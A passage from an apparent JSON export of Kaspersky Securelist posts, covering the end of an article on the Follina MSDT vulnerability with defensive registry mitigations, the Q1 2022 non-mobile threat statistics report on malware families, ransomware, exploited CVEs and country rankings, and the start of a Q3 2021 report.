protect against this using the [Behavior Detection](<https://www.kaspersky.com/enterprise-security/wiki-section/products/behavior-based-protection>) and [Exploit Prevention](<https://www.kaspersky.com/enterprise-security/wiki-section/products/exploit-prevention>) tools. \nThe following verdict names are possible:\n\n * PDM:Exploit.Win32.Generic \n * HEUR:Exploit.MSOffice.Agent.n\n * HEUR:Exploit.MSOffice.Agent.gen \n * HEUR:Exploit.MSOffice.CVE-2017-0199.a\n * HEUR:Exploit.MSOffice.CVE-2021-40444.a\n * HEUR:Exploit.MSOffice.Generic\n\n_Geography of Follina exploitation attempts with Exploit.MSOffice.CVE-2021-40444.a verdict, May 1 \u2013 June 3, 2022 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/06/08064948/01-en-cve-2022-30190.png>))_\n\nWe expect to see more Follina exploitation attempts to gain access to corporate resources, including for ransomware attacks and data breaches. Therefore, we continue to closely monitor the situation and improve overall vulnerability detection. In addition, as part of the [Managed Detection and Response](<https://www.kaspersky.com/enterprise-security/managed-detection-and-response>) service, our SOC experts can detect vulnerability exploitation, investigate attacks and provide clients with all necessary threat-related information. \nTo protect against Follina exploitation, we strongly advise that you follow Microsoft's own guidelines: [Guidance for CVE-2022-30190 Microsoft Support Diagnostic Tool Vulnerability](<https://msrc-blog.microsoft.com/2022/05/30/guidance-for-cve-2022-30190-microsoft-support-diagnostic-tool-vulnerability/>). In particular, to prevent exploitation of this vulnerability, you can disable support for the MSDT URL protocol by taking these steps:\n\n 1. Run Command Prompt as Administrator.\n 2. To back up the registry key, execute the command "reg export HKEY_CLASSES_ROOT\\ms-msdt filename"\n 3. Execute the command "reg delete HKEY_CLASSES_ROOT\\ms-msdt /f".", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-06-06T08:00:02", "type": "securelist", "title": "CVE-2022-30190 (Follina) vulnerability in MSDT: description and counteraction", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-0199", "CVE-2021-40444", "CVE-2022-30190"], "modified": "2022-06-06T08:00:02", "id": "SECURELIST:29152837444B2A7E5A9B9FCB107DAB36", "href": "https://securelist.com/cve-2022-30190-follina-vulnerability-in-msdt-description-and-counteraction/106703/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-30T13:56:48", "description": "\n\n * [IT threat evolution in Q1 2022](<https://securelist.com/it-threat-evolution-q1-2022/106513/>)\n * **IT threat evolution in Q1 2022. Non-mobile statistics**\n * [IT threat evolution in Q1 2022. Mobile statistics](<https://securelist.com/it-threat-evolution-in-q1-2022-mobile-statistics/106589/>)\n\n_These statistics are based on detection verdicts of Kaspersky products and services received from users who consented to providing statistical data._\n\n## Quarterly figures\n\nAccording to Kaspersky Security Network, in Q1 2022:\n\n * Kaspersky solutions blocked 1,216,350,437 attacks from online resources across the globe.\n * Web Anti-Virus recognized 313,164,030 unique URLs as malicious.\n * Attempts to run malware for stealing money from online bank accounts were stopped on the computers of 107,848 unique users.\n * Ransomware attacks were defeated on the computers of 74,694 unique users.\n * Our File Anti-Virus detected 58,989,058 unique malicious and potentially unwanted objects.\n\n## Financial threats\n\n### Financial threat statistics\n\nIn Q1 2022 Kaspersky solutions blocked the launch of at least one piece of malware designed to steal money from bank accounts on the computers of 107,848 unique users.\n\n_Number of unique users attacked by financial malware, Q1 2022 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/05/25231205/01-en-malware-report-q1-2022-pc.png>))_\n\n#### Geography of financial malware attacks\n\n_To evaluate and compare the risk of being infected by banking Trojans and ATM/POS malware worldwide, for each country and territory we calculated the share of users of Kaspersky products who faced this threat during the reporting period as a percentage of all users of our products in that country or territory._\n\n_Geography of financial malware attacks, Q1 2022 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/05/25231231/02-en-malware-report-q1-2022-pc.png>))_\n\n**TOP 10 countries by share of attacked users**\n\n| **Country*** | **%**** \n---|---|--- \n1 | Turkmenistan | 4.5 \n2 | Afghanistan | 4.0 \n3 | Tajikistan | 3.9 \n4 | Yemen | 2.8 \n5 | Uzbekistan | 2.4 \n6 | China | 2.2 \n7 | Azerbaijan | 2.0 \n8 | Mauritania | 2.0 \n9 | Sudan | 1.8 \n10 | Syria | 1.8 \n \n_* Excluded are countries with relatively few Kaspersky product users (under 10,000)._ \n_** Unique users whose computers were targeted by financial malware as a percentage of all unique users of Kaspersky products in the country._\n\n#### TOP 10 banking malware families\n\n| **Name** | **Verdicts** | **%*** \n---|---|---|--- \n1 | Ramnit/Nimnul | Trojan-Banker.Win32.Ramnit | 36.5 \n2 | Zbot/Zeus | Trojan-Banker.Win32.Zbot | 16.7 \n3 | CliptoShuffler | Trojan-Banker.Win32.CliptoShuffler | 6.7 \n4 | SpyEye | Trojan-Spy.Win32.SpyEye | 6.3 \n5 | Gozi | Trojan-Banker.Win32.Gozi | 5.2 \n6 | Cridex/Dridex | Trojan-Banker.Win32.Cridex | 3.5 \n7 | Trickster/Trickbot | Trojan-Banker.Win32.Trickster | 3.3 \n8 | RTM | Trojan-Banker.Win32.RTM | 2.7 \n9 | BitStealer | Trojan-Banker.Win32.BitStealer | 2.2 \n10 | Danabot | Trojan-Banker.Win32.Danabot | 1.8 \n \n_* Unique users who encountered this malware family as a percentage of all users attacked by financial malware._\n\nOur TOP 10 leader changed in Q1: the familiar ZeuS/Zbot (16.7%) dropped to second place and Ramnit/Nimnul (36.5%) took the lead. The TOP 3 was rounded out by CliptoShuffler (6.7%).\n\n## Ransomware programs\n\n### Quarterly trends and highlights\n\n#### Law enforcement successes\n\n * Several members of the REvil ransomware crime group were [arrested](<https://tass.com/society/1388613>) by Russian law enforcement in January. The Russian Federal Security Service (FSB) [says](<http://www.fsb.ru/fsb/press/message/single.htm!id=10439388%40fsbMessage.html>) it seized the following assets from the cybercriminals: "more than 426 million rubles ($5.6 million) including denominated in cryptocurrency; $600,000; 500,000 euros; computer equipment, the crypto wallets that were used to perpetrate crimes, and 20 luxury cars that were purchased with illicitly obtained money."\n * In February, a Canadian citizen was [sentenced](<https://www.bleepingcomputer.com/news/security/netwalker-ransomware-affiliate-sentenced-to-80-months-in-prison/>) to 6 years and 8 months in prison for involvement in NetWalker ransomware attacks (also known as Mailto ransomware).\n * In January, Ukrainian police [arrested](<https://www.bleepingcomputer.com/news/security/ukranian-police-arrests-ransomware-gang-that-hit-over-50-firms/>) a ransomware gang who delivered an unclarified strain of malware via e-mail. According to the statement released by the police, over fifty companies in the United States and Europe were attacked by the cybercriminals.\n\n#### HermeticWiper, HermeticRansom and RUransom, etc.\n\nIn February, new malware was discovered which carried out attacks with the aim of destroying files. Two pieces of malware \u2014 a Trojan called HermeticWiper that destroys data and a cryptor called [HermeticRansom](<https://securelist.com/elections-goransom-and-hermeticwiper-attack/105960/>) \u2014 were both [used](<https://www.kaspersky.com/blog/hermeticransom-hermeticwiper-attacks-2022/43825/>) in cyberattacks in Ukraine. That February, Ukrainian systems were attacked by another Trojan called IsaacWiper, followed by a third Trojan in March called CaddyWiper. The apparent aim of this malware family was to render infected computers unusable leaving no possibility of recovering files.\n\nAn intelligence team later discovered that HermeticRansom only superficially encrypts files, and ones encrypted by the ransomware [can be decrypted](<https://threatpost.com/free-hermeticransom-ransomware-decryptor-released/178762/>).\n\nRUransom malware was discovered in March, which was created to encrypt files on computers in Russia. The analysis of the malicious code revealed it was developed to wipe data, as RUransom generates keys for all the victim's encrypted files without storing them anywhere.\n\n#### Conti source-code leak\n\nThe ransomware group Conti had its source code leaked along with its chat logs which were made public. It happened shortly after the Conti group [expressed](<https://www.theverge.com/2022/2/28/22955246/conti-ransomware-russia-ukraine-chat-logs-leaked>) support for the Russian government's actions on its website. The true identity of the individual who leaked the data is currently unknown. According to different versions, it could have been a researcher or an insider in the group who disagrees with its position.\n\nWhoever it may have been, the leaked ransomware source codes in the public domain will obviously be at the fingertips of other cybercriminals, which is what happened on more than one occasion with examples like [Hidden Tear](<https://securelist.com/hidden-tear-and-its-spin-offs/73565/>) and Babuk.\n\n#### Attacks on NAS devices\n\nNetwork-attached storage (NAS) devices continue to be targeted by ransomware attacks. A new [wave of Qlocker Trojan infections](<https://www.bleepingcomputer.com/news/security/qlocker-ransomware-returns-to-target-qnap-nas-devices-worldwide/>) on QNAP NAS devices occurred in January following a brief lull which lasted a few months. A new form of ransomware infecting QNAP NAS devices also appeared in the month of January called [DeadBolt](<https://www.bleepingcomputer.com/news/security/qnap-warns-of-new-deadbolt-ransomware-encrypting-nas-devices/>), and [ASUSTOR](<https://www.bleepingcomputer.com/news/security/deadbolt-ransomware-now-targets-asustor-devices-asks-50-btc-for-master-key/>) devices became its new target in February.\n\n#### Maze Decryptor\n\nMaster decryption keys for Maze, Sekhmet and Egregor ransomware were made public in February. The keys turned out to be authentic and we increased our support to decrypt files encrypted by these [infamous](<https://securelist.com/maze-ransomware/99137/>) forms of [ransomware](<https://securelist.com/targeted-ransomware-encrypting-data/99255/>) in our RakhniDecryptor utility. The decryptor is available on the website of our [No Ransom](<https://noransom.kaspersky.com/>) project and the website of the international NoMoreRansom project in the [Decryption Tools](<https://www.nomoreransom.org/en/decryption-tools.html>) section.\n\n### Number of new modifications\n\nIn Q1 2022, we detected eight new ransomware families and 3083 new modifications of this malware type.\n\n_Number of new ransomware modifications, Q1 2021 \u2014 Q1 2022 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/05/25231301/03-en-ru-es-malware-report-q1-2022-pc.png>))_\n\n### Number of users attacked by ransomware Trojans\n\nIn Q1 2022, Kaspersky products and technologies protected 74,694 users from ransomware attacks.\n\n_Number of unique users attacked by ransomware Trojans, Q1 2022 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/05/25231325/04-en-malware-report-q1-2022-pc.png>))_\n\n### Geography of attacked users\n\n_Geography of attacks by ransomware Trojans, Q1 2022 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/05/25231349/05-en-malware-report-q1-2022-pc.png>))_\n\n**TOP 10 countries attacked by ransomware Trojans**\n\n| **Country*** | **%**** \n---|---|--- \n1 | Bangladesh | 2.08 \n2 | Yemen | 1.52 \n3 | Mozambique | 0.82 \n4 | China | 0.49 \n5 | Pakistan | 0.43 \n6 | Angola | 0.40 \n7 | Iraq | 0.40 \n8 | Egypt | 0.40 \n9 | Algeria | 0.36 \n10 | Myanmar | 0.35 \n \n_* Excluded are countries with relatively few Kaspersky users (under 50,000)._ \n_** Unique users whose computers were attacked by Trojan encryptors as a percentage of all unique users of Kaspersky products in the country._\n\n### TOP 10 most common families of ransomware Trojans\n\n| **Name** | **Verdicts*** | **Percentage of attacked users**** \n---|---|---|--- \n1 | Stop/Djvu | Trojan-Ransom.Win32.Stop | 24.38 \n2 | WannaCry | Trojan-Ransom.Win32.Wanna | 13.71 \n3 | (generic verdict) | Trojan-Ransom.Win32.Gen | 9.35 \n4 | (generic verdict) | Trojan-Ransom.Win32.Phny | 7.89 \n5 | (generic verdict) | Trojan-Ransom.Win32.Encoder | 5.66 \n6 | (generic verdict) | Trojan-Ransom.Win32.Crypren | 4.07 \n7 | (generic verdict) | Trojan-Ransom.Win32.CryFile | 3.72 \n8 | PolyRansom/VirLock | Trojan-Ransom.Win32.PolyRansom / Virus.Win32.PolyRansom | 3.37 \n9 | (generic verdict) | Trojan-Ransom.Win32.Crypmod | 3.17 \n10 | (generic verdict) | Trojan-Ransom.Win32.Agent | 1.99 \n \n_* Statistics are based on detection verdicts of Kaspersky products. The information was provided by Kaspersky product users who consented to provide statistical data._ \n_** Unique Kaspersky users attacked by specific ransomware Trojan families as a percentage of all unique users attacked by ransomware Trojans._\n\n## Miners\n\n### Number of new miner modifications\n\nIn Q1 2022, Kaspersky solutions detected 21,282 new modifications of miners.\n\n_Number of new miner modifications, Q1 2022 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/05/25231418/06-en-malware-report-q1-2022-pc.png>))_\n\n### Number of users attacked by miners\n\nIn Q1, we detected attacks using miners on the computers of 508,449 unique users of Kaspersky products and services worldwide.\n\n_Number of unique users attacked by miners, Q1 2022 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/05/25231445/07-en-malware-report-q1-2022-pc.png>))_\n\n### Geography of miner attacks\n\n_Geography of miner attacks, Q1 2022 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/05/25231509/08-en-malware-report-q1-2022-pc.png>))_\n\n**TOP 10 countries attacked by miners**\n\n| **Country*** | **%**** \n---|---|--- \n1 | Ethiopia | 3.01 \n2 | Tajikistan | 2.60 \n3 | Rwanda | 2.45 \n4 | Uzbekistan | 2.15 \n5 | Kazakhstan | 1.99 \n6 | Tanzania | 1.94 \n7 | Ukraine | 1.83 \n8 | Pakistan | 1.79 \n9 | Mozambique | 1.69 \n10 | Venezuela | 1.67 \n \n_* Excluded are countries with relatively few users of Kaspersky products (under 50,000)._ \n_** Unique users attacked by miners as a percentage of all unique users of Kaspersky products in the country._\n\n## Vulnerable applications used by criminals during cyberattacks\n\n### Quarter highlights\n\nIn Q1 2022, a number of serious vulnerabilities were found in Microsoft Windows and its components. More specifically, the vulnerability [CVE-2022-21882](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-21882>) was found to be exploited by an unknown group of cybercriminals: a "type confusion" bug in the win32k.sys driver the attacker can use to gain system privileges. Also worth noting is [CVE-2022-21919](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-21919>), a vulnerability in the User Profile Service which makes it possible to elevate privileges, along with [CVE-2022-21836](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-21836>), which can be used to forge digital certificates.\n\nOne of the major talking points in Q1 was an exploit that targeted the [CVE-2022-0847](<https://dirtypipe.cm4all.com/>) vulnerability in the Linux OS kernel. It was dubbed "Dirty Pipe". [Researchers discovered](<https://securelist.com/cve-2022-0847-aka-dirty-pipe-vulnerability-in-linux-kernel/106088/>) an "uninitialized memory" vulnerability when analyzing corrupted files, which makes it possible to rewrite a part of the OS memory, namely page memory that contains system files' data. This in turn opens up an opportunity, such as elevating attacker's privileges to root. It's worth noting that this vulnerability is fairly easy to exploit, which means users of all systems should regularly install security patches and use all available means to prevent infection.\n\nWhen it comes to network threats, this quarter continued to show how cybercriminals often resort to the technique of brute-forcing passwords to gain unauthorized access to various network services, the most popular of which are MSSQL, RDP and SMB. Attacks using the EternalBlue, EternalRomance and similar exploits remain as popular as ever. Due to widespread unpatched versions of Microsoft Exchange Server, networks often fall victim to exploits of ProxyToken, ProxyShell, ProxyOracle and other vulnerabilities. One example of a critical vulnerability found is remote code execution (RCE) in the Microsoft Windows HTTP protocol stack which allows an attack to be launched remotely by sending a special network packet to a vulnerable system by means of the HTTP trailer functionality. New attacks on network applications which will probably also become common are RCE attacks on the popular Spring Framework and Spring Cloud Gateway. Specific examples of vulnerabilities in these applications are [CVE-2022-22965](<https://nvd.nist.gov/vuln/detail/CVE-2022-22965>) (Spring4Shell) and [CVE-2022-22947](<https://nvd.nist.gov/vuln/detail/CVE-2022-22947>).\n\n### Vulnerability statistics\n\nQ1 2022 saw an array of changes in the statistics on common vulnerability types. For instance, the top place in the statistics is still firmly held by exploits targeting vulnerabilities in Microsoft Office and their share has increased significantly to 78.5%. The same common vulnerabilities we've written about on more than one occasion are still the most widely exploited within this category of threats. These are [CVE-2017-11882](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11882>) and [CVE-2018-0802](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-0802>), which cause a buffer overflow when processing objects in a specially crafted document in the Equation Editor component and ultimately allow an attacker to execute arbitrary code. There's also [CVE-2017-8570](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8570>), where opening a specially crafted file with an affected version of Microsoft Office software gives attackers the opportunity to perform various actions on the vulnerable system. Another vulnerability found last year which is very popular with cybercriminals is [CVE-2021-40444](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-40444>), which they can use to exploit through a specially prepared Microsoft Office document with an embedded malicious ActiveX control for executing arbitrary code in the system.\n\n_Distribution of exploits used by cybercriminals, by type of attacked application, Q1 2022 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/05/25231538/09-en-malware-report-q1-2022-pc.png>))_\n\nExploits targeting browsers came second again in Q1, although their share dropped markedly to just 7.64%. Browser developers put a great deal of effort into patching vulnerability exploits in each new version and closing a large number of gaps in system security. Apart from that, the majority of browsers have automatic updates as opposed to the distinct example of Microsoft Office, where many of its users still use outdated versions and are in no rush to install security updates. That could be precisely the reason why we've seen a reduction in the share of browser exploits in our statistics. However, this does not mean they're no longer an immediate threat. For instance, Chrome's developers fixed a number of critical RCE vulnerabilities, including:\n\n * [CVE-2022-1096](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-1096>): a "type confusion" vulnerability in the V8 script engine which gives attackers the opportunity to remotely execute code (RCE) in the context of the browser's security sandbox.\n * [CVE-2022-0609](<https://nvd.nist.gov/vuln/detail/CVE-2022-0609>): a use-after-free vulnerability which allows to corrupt the process memory and remotely execute arbitrary codes when performing specially generated scripts that use animation.\n\nSimilar vulnerabilities were found in the browser's other components: [CVE-2022-0605](<https://nvd.nist.gov/vuln/detail/CVE-2022-0605>)which uses Web Store API, and [CVE-2022-0606](<https://nvd.nist.gov/vuln/detail/CVE-2022-0606>) which is associated with vulnerabilities in the WebGL backend (ANGLE). Another vulnerability found was [CVE-2022-0604](<https://nvd.nist.gov/vuln/detail/CVE-2022-0604>), which can be used to exploit a heap buffer overflow in Tab Groups, also potentially leading to remote code execution (RCE).\n\nExploits for Android came third in our statistics (4.10%), followed by exploits targeting the Adobe Flash Platform (3.49%), PDF files (3.48%) and Java apps (2.79%).\n\n## Attacks on macOS\n\nThe year began with a number of interesting multi-platform finds: the [Gimmick](<https://www.securityweek.com/chinese-cyberspies-seen-using-macos-variant-gimmick-malware>) multi-platform malware family with Windows and macOS variants that uses Google Drive to communicate with the C&C server, along with the [SysJoker backdoor](<https://threatpost.com/undetected-sysjoker-backdoor-malwarewindows-linux-macos/177532/>) with versions tailored for Windows, Linux and macOS.\n\n**TOP 20 threats for macOS**\n\n| **Verdict** | **%*** \n---|---|--- \n1 | AdWare.OSX.Pirrit.ac | 13.23 \n2 | AdWare.OSX.Pirrit.j | 12.05 \n3 | Monitor.OSX.HistGrabber.b | 8.83 \n4 | AdWare.OSX.Pirrit.o | 7.53 \n5 | AdWare.OSX.Bnodlero.at | 7.41 \n6 | Trojan-Downloader.OSX.Shlayer.a | 7.06 \n7 | AdWare.OSX.Pirrit.aa | 6.75 \n8 | AdWare.OSX.Pirrit.ae | 6.07 \n9 | AdWare.OSX.Cimpli.m | 5.35 \n10 | Trojan-Downloader.OSX.Agent.h | 4.96 \n11 | AdWare.OSX.Pirrit.gen | 4.76 \n12 | AdWare.OSX.Bnodlero.bg | 4.60 \n13 | AdWare.OSX.Bnodlero.ax | 4.45 \n14 | AdWare.OSX.Agent.gen | 3.74 \n15 | AdWare.OSX.Agent.q | 3.37 \n16 | Backdoor.OSX.Twenbc.b | 2.84 \n17 | Trojan-Downloader.OSX.AdLoad.mc | 2.81 \n18 | Trojan-Downloader.OSX.Lador.a | 2.81 \n19 | AdWare.OSX.Bnodlero.ay | 2.81 \n20 | Backdoor.OSX.Agent.z | 2.56 \n \n_* Unique users who encountered this malware as a percentage of all users of Kaspersky security solutions for macOS who were attacked._\n\nThe TOP 20 threats to users detected by Kaspersky security solutions for macOS is usually dominated by various adware apps. The top two places in the rating were taken by adware apps from the AdWare.OSX.Pirrit family, while third place was taken by a member of the Monitor.OSX.HistGrabber.b family of potentially unwanted software which sends users' browser history to its owners' servers.\n\n### Geography of threats for macOS\n\n_Geography of threats for macOS, Q1 2022 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/05/25231608/10-en-malware-report-q1-2022-pc.png>))_\n\n**TOP 10 countries by share of attacked users**\n\n| **Country*** | **%**** \n---|---|--- \n1 | France | 2.36 \n2 | Spain | 2.29 \n3 | Italy | 2.16 \n4 | Canada | 2.15 \n5 | India | 1.95 \n6 | United States | 1.90 \n7 | Russian Federation | 1.83 \n8 | United Kingdom | 1.58 \n9 | Mexico | 1.49 \n10 | Australia | 1.36 \n \n_* Excluded from the rating are countries with relatively few users of Kaspersky security solutions for macOS (under 10,000)._ \n_** Unique users attacked as a percentage of all users of Kaspersky security solutions for macOS in the country._\n\nIn Q1 2022, the country where the most users were attacked was France (2.36%), followed by Spain (2.29%) and Italy (2.16%). Adware from the Pirrit family was encountered most frequently out of all macOS threats in the listed countries.\n\n## IoT attacks\n\n### IoT threat statistics\n\nIn Q1 2022, most devices that attacked Kaspersky traps did so using the Telnet protocol as before. Just one quarter of devices attempted to brute-force our SSH traps.\n\nTelnet | 75.28% \n---|--- \nSSH | 24.72% \n \n**_Distribution of attacked services by number of unique IP addresses of devices that carried out attacks, Q1 2022_**\n\nIf we look at sessions involving Kaspersky honeypots, we see far greater Telnet dominance.\n\nTelnet | 93.16% \n---|--- \nSSH | 6.84% \n \n**_Distribution of cybercriminal working sessions with Kaspersky traps, Q1 2022_**\n\n**TOP 10 threats delivered to IoT devices via Telnet**\n\n| **Verdict** | **%*** \n---|---|--- \n1 | Backdoor.Linux.Mirai.b | 38.07 \n2 | Trojan-Downloader.Linux.NyaDrop.b | 9.26 \n3 | Backdoor.Linux.Mirai.ba | 7.95 \n4 | Backdoor.Linux.Gafgyt.a | 5.55 \n5 | Trojan-Downloader.Shell.Agent.p | 4.62 \n6 | Backdoor.Linux.Mirai.ad | 3.89 \n7 | Backdoor.Linux.Gafgyt.bj | 3.02 \n8 | Backdoor.Linux.Agent.bc | 2.76 \n9 | RiskTool.Linux.BitCoinMiner.n | 2.00 \n10 | Backdoor.Linux.Mirai.cw | 1.98 \n \n_* Share of each threat delivered to infected devices as a result of a successful Telnet attack out of the total number of delivered threats._\n\nSimilar IoT-threat statistics [are published in the DDoS report](<https://securelist.com/ddos-attacks-in-q1-2022/105045/#attacks-on-iot-honeypots>) for Q1 2022.\n\n## Attacks via web resources\n\n_The statistics in this section are based on Web Anti-Virus, which protects users when malicious objects are downloaded from malicious/infected web pages. Cybercriminals create such sites on purpose and web resources with user-created content (for example, forums), as well as hacked legitimate resources, can be infected._\n\n### Countries and territories that serve as sources of web-based attacks: TOP 10\n\n_The following statistics show the distribution by country or territory of the sources of Internet attacks blocked by Kaspersky products on user computers (web pages with redirects to exploits, sites hosting malicious programs, botnet C&C centers, etc.). Any unique host could be the source of one or more web-based attacks._\n\n_To determine the geographic source of web attacks, the GeoIP technique was used to match the domain name to the real IP address at which the domain is hosted._\n\nIn Q1 2022, Kaspersky solutions blocked 1,216,350,437 attacks launched from online resources across the globe. 313,164,030 unique URLs were recognized as malicious by Web Anti-Virus components.\n\n_Distribution of web-attack sources by country and territory, Q1 2022 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/05/25231643/11-en-malware-report-q1-2022-pc.png>))_\n\n### Countries and territories where users faced the greatest risk of online infection\n\nTo assess the risk of online infection faced by users in different countries and territories, for each country or territory we calculated the percentage of Kaspersky users on whose computers Web Anti-Virus was triggered during the quarter. The resulting data provides an indication of the aggressiveness of the environment in which computers operate in different countries and territories.\n\nThis rating only includes attacks by malicious programs that fall under the **Malware class**; it does not include Web Anti-Virus detections of potentially dangerous or unwanted programs such as RiskTool or adware.\n\n| **Country or territory*** | **%**** \n---|---|--- \n1 | Taiwan | 22.63 \n2 | Tunisia | 21.57 \n3 | Algeria | 16.41 \n4 | Mongolia | 16.05 \n5 | Serbia | 15.96 \n6 | Libya | 15.67 \n7 | Estonia | 14.45 \n8 | Greece | 14.37 \n9 | Nepal | 14.01 \n10 | Hong Kong | 13.85 \n11 | Yemen | 13.17 \n12 | Sudan | 13.08 \n13 | Slovenia | 12.94 \n14 | Morocco | 12.82 \n15 | Qatar | 12.78 \n16 | Croatia | 12.53 \n17 | Republic of Malawi | 12.33 \n18 | Sri Lanka | 12.28 \n19 | Bangladesh | 12.26 \n20 | Palestine | 12.23 \n \n_* Excluded are countries and territories with relatively few Kaspersky users (under 10,000)._ \n_** Unique users targeted by **Malware-class** attacks as a percentage of all unique users of Kaspersky products in the country or territory._\n\nOn average during the quarter, 8.18% of computers of Internet users worldwide were subjected to at least one **Malware-class** web attack.\n\n_Geography of web-based malware attacks, Q1 2022 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/05/27074233/13-en-malware-report-q1-2022-pc-1.png>))_\n\n## Local threats\n\n_In this section, we analyze statistical data obtained from the OAS and ODS modules in Kaspersky products. It takes into account malicious programs that were found directly on users' computers or removable media connected to them (flash drives, camera memory cards, phones, external hard drives), or which initially made their way onto the computer in non-open form (for example, programs in complex installers, encrypted files, etc.)._\n\nIn Q1 2022, our File Anti-Virus detected **58,989,058** malicious and potentially unwanted objects.\n\n### Countries where users faced the highest risk of local infection\n\nFor each country, we calculated the percentage of Kaspersky product users on whose computers File Anti-Virus was triggered during the reporting period. These statistics reflect the level of personal computer infection in different countries.\n\nNote that this rating only includes attacks by malicious programs that fall under the **Malware class**; it does not include File Anti-Virus triggerings in response to potentially dangerous or unwanted programs, such as RiskTool or adware.\n\n| **Country*** | **%**** \n---|---|--- \n1 | Yemen | 48.38 \n2 | Turkmenistan | 47.53 \n3 | Tajikistan | 46.88 \n4 | Cuba | 45.29 \n5 | Afghanistan | 42.79 \n6 | Uzbekistan | 41.56 \n7 | Bangladesh | 41.34 \n8 | South Sudan | 39.91 \n9 | Ethiopia | 39.76 \n10 | Myanmar | 37.22 \n11 | Syria | 36.89 \n12 | Algeria | 36.02 \n13 | Burundi | 34.13 \n14 | Benin | 33.81 \n15 | Rwanda | 33.11 \n16 | Sudan | 32.90 \n17 | Tanzania | 32.39 \n18 | Kyrgyzstan | 32.26 \n19 | Venezuela | 32.00 \n20 | Iraq | 31.93 \n \n_* Excluded are countries with relatively few Kaspersky users (under 10,000)._ \n_** Unique users on whose computers **Malware-class** local threats were blocked, as a percentage of all unique users of Kaspersky products in the country._\n\n_Geography of local infection attempts, Q1 2022 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/05/25231744/13-en-malware-report-q1-2022-pc.png>))_\n\nOverall, 15.48% of user computers globally faced at least one Malware-class local threat during Q1. Russia scored 16.88% in this rating.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-05-27T08:00:05", "type": "securelist", "title": "IT threat evolution in Q1 2022. Non-mobile statistics", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11882", "CVE-2017-8570", "CVE-2018-0802", "CVE-2021-40444", "CVE-2022-0604", "CVE-2022-0605", "CVE-2022-0606", "CVE-2022-0609", "CVE-2022-0847", "CVE-2022-1096", "CVE-2022-21836", "CVE-2022-21882", "CVE-2022-21919", "CVE-2022-22947", "CVE-2022-22965"], "modified": "2022-05-27T08:00:05", "id": "SECURELIST:11665FFD7075FB9D59316195101DE894", "href": "https://securelist.com/it-threat-evolution-in-q1-2022-non-mobile-statistics/106531/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-11-26T12:37:38", "description": "\n\n * [IT threat evolution Q3 2021](<https://securelist.com/it-threat-evolution-q3-2021/104876/>)\n * **IT threat evolution in Q3 2021. PC statistics**\n * [IT threat evolution in Q3 2021. Mobile statistics](<https://securelist.com/it-threat-evolution-in-q3-2021-mobile-statistics/105020/>)\n\n_These statistics are based on detection verdicts of Kaspersky products received from users who consented to providing statistical data._\n\n## Quarterly figures\n\nAccording to Kaspersky Security Network, in Q3 2021:\n\n * Kaspersky solutions blocked 1,098,968,315 attacks from online resources across the globe.\n * Web 